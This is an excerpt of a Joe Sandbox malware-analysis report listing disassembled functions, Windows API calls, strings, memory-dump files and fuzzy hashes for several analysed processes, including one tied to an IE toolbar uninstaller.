EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFDA5802218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFDA5802244
GetCurrentThreadId.KERNEL32 ref: 00007FFDA5802252
GetCurrentProcessId.KERNEL32 ref: 00007FFDA580225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFDA580226E

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: f732216ccb459cebfc6c5c483dea583d6165ef4f5f0db10682e56939b99ffe5e
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: CC114C22B16B058AEB00CB71E8643A833A4FB1AB58F440A71EA2E467A9DF78D154C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFDA5805C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA5805C2A

Strings

csm, xrefs: 00007FFDA5805DBE
csm, xrefs: 00007FFDA5805C4F

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: 5ef3f8c4a8fd4e4fd0b2032b195f7717601e06d5e3bdfba1db7d7f91433890e4
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 6A71A13270A68986D7608B35946477D7BA0FF16F84F148276EECC07B8ACB2CE451C748

Function 00007FFDA5806298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA5806342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFDA580636B

Strings

csm, xrefs: 00007FFDA580646B

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 166c4002f63560a9acfaca314f68b28f34e50455987cbd9472f8afa8990448e2
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 5A514F3271AB4596D660AF26E05036D77A4FF8AF90F100274EB8D07B56CF38E461CB04

Function 00007FFDA580EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFDA580EBA3
GetLastError.KERNEL32 ref: 00007FFDA580EBC5

Strings

U, xrefs: 00007FFDA580EB4F

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 4a8bd31637707edcde8d3a40ab9d16c1835626c0481f0ffbffb370d3ab505f83
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: B341C332B1AA4582EB20DF35F8643AA67A0FB89B94F404131EE4E87799DF3CD445CB44

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFDA5810910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA5803A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFDA5803A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFDA5810993

Strings

csm, xrefs: 00007FFDA581092B
f, xrefs: 00007FFDA5810925

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 53be86f5b2d531bba98e05169c4d62ac75cc138df86f4676f38e93a998b29913
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 3011E432B19789C6E7109F32A4612696764FF46FC0F088175EE880BB87CE38D991C704

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFDA5803990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA580112F), ref: 00007FFDA58039E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDA580112F), ref: 00007FFDA5803A21

Strings

csm, xrefs: 00007FFDA5803A0E

Memory Dump Source

Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true

Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 2f74dbc9bcd65b0479c6d0e8f719c8c045e467d259546e43a767c94aecd621f4
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: F4115832619B8582EB208B25F41036AB7E4FB8AF84F584270EE8D07B59DF3CD651CB04

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: qNHTRl.exePID: 5052, Parent PID: 3476COMMON

Executed Functions

Function 0270017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 027001DF

Memory Dump Source

Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 99f3ecd34e9d9fbbd352a92cc051f55fc7f12eb9ed1f4e0aa011050184b68992
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: D6A13770A00606EFDB15CFA9C8C0BAEB7F5FF49328B148069E415EB291D770EA55CB90

Function 0270044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0270048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 027004F1

Memory Dump Source

Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: 2cb909c21f2b66a1aaa5c62b4441e7cf7967d539b6835f3fb9c70d89b8034aa4
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: DE21F675A00205EBCB209BA48CC5FAFB7F9EF05324F104428FA0AB22C1D731A9099664

Non-executed Functions

Function 027000CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

ntdl, xrefs: 02700142
l, xrefs: 02700149

Memory Dump Source

Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: c37d3dc9da464fc0dee2808e90dafb47c7d238628ba1f4f5b83be04f12a06d80
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: 3C115EB5701A01EFCB16AF18C848A0EBBF6FF88760B218159E105D7750EB359A258FD5

Function 02700643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

l, xrefs: 0270068E
ntdl, xrefs: 02700684

Memory Dump Source

Source File: 00000029.00000003.3258698659.0000000002700000.00000040.00001000.00020000.00000000.sdmp, Offset: 02700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2700000_qNHTRl.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: a09a0097b3a8893e6ec36bf1998d90c9b16db5805ca73358a6abf7b4861e50c9
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 4E018871700114AFCB05DF99C845EAEFBFAEF84764F0440A9F904A7350DA70DE048BA1

Analysis Process: NroRNr.exePID: 4800, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1047
Total number of Limit Nodes:	29

Executed Functions

Function 00FA1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00FA1006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00FA1013
GetLastError.KERNEL32 ref: 00FA101F
GetCommandLineW.KERNEL32(?), ref: 00FA1040
CommandLineToArgvW.SHELL32(00000000), ref: 00FA1047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00FA1061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00FA1073
LoadLibraryW.KERNELBASE(?), ref: 00FA1085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00FA1097
FreeLibrary.KERNELBASE(00000000), ref: 00FA10A4
CloseHandle.KERNELBASE(00000000), ref: 00FA10AB
CoUninitialize.COMBASE ref: 00FA10B1
LocalFree.KERNEL32(00000000), ref: 00FA10BC

Strings

tbcore3.dll, xrefs: 00FA105C, 00FA1067
MyUnregisterServer, xrefs: 00FA1091
Global\IEToolbarUninstaller, xrefs: 00FA100C
tbcore3U.dll, xrefs: 00FA106E, 00FA1079

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: b35e82534b406fd128df3706b75dccd0237bfccc283caba46e0b0df1c6d9deff
Instruction ID: 08f3607be1ac1f2cd1ab76ea9ea9938349e1defd4c5fa63ebb45d67c9c0ad244
Opcode Fuzzy Hash: b35e82534b406fd128df3706b75dccd0237bfccc283caba46e0b0df1c6d9deff
Instruction Fuzzy Hash: A31187F29093599B87205B609C08A9F3BACBF477A1B068525F542D2050DFE1D946F7B2

Function 00FA1465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 00FA146D

Part of subcall function 00FA143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00FA1472,?,?,00FA54EE,000000FF,0000001E,?,00FA36FC,?,00000001,?,?,00FA2A2A,00000018), ref: 00FA1444
Part of subcall function 00FA143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FA1454

ExitProcess.KERNEL32 ref: 00FA1476

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 0f2504f2159341e93f4724085350758b8af7fd5f2dd1a4c14f997cc3c370ae33
Instruction ID: b516ba69f19fe0a8ea188ed66cff1c2589b655e72005d4dd401772ff867935d0
Opcode Fuzzy Hash: 0f2504f2159341e93f4724085350758b8af7fd5f2dd1a4c14f997cc3c370ae33
Instruction Fuzzy Hash: CBB0927100020CBBDB062F16DC0A84D3F2AFB823A0B65C020F80849031DFB2AD92AA90

Function 00FA261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00FA2630

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 6e4150f24c5814ec6ea9325aa44ae34f11b9f13757e025bc5ebd7244cd9fb7f8
Instruction ID: 895daa557faceaf373e6b70234cb3dd3f9530fd4cecf85fe4f49412ba4d9e80d
Opcode Fuzzy Hash: 6e4150f24c5814ec6ea9325aa44ae34f11b9f13757e025bc5ebd7244cd9fb7f8
Instruction Fuzzy Hash: 0BD0A7B6A9434C5EDB009F75BC087223BDCD3853A5F108435BD0DC6251F6B0C591EA00

Function 00FA1681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 00FA168D

Part of subcall function 00FA1555: __lock.LIBCMT ref: 00FA1563
Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA159A
Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15AF
Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15D9
Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15EF
Part of subcall function 00FA1555: __decode_pointer.LIBCMT ref: 00FA15FC
Part of subcall function 00FA1555: __initterm.LIBCMT ref: 00FA162B
Part of subcall function 00FA1555: __initterm.LIBCMT ref: 00FA163B

Memory Dump Source

Source File: 0000002B.00000002.3272752465.0000000000FA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00FA0000, based on PE: true

Associated: 0000002B.00000002.3272728088.0000000000FA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272793991.0000000000FAA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002B.00000002.3272812900.0000000000FAC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_fa0000_NroRNr.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 0628bc902d57011cea9b1553c1d55f34c6766bb761e981457de608fff7858e64
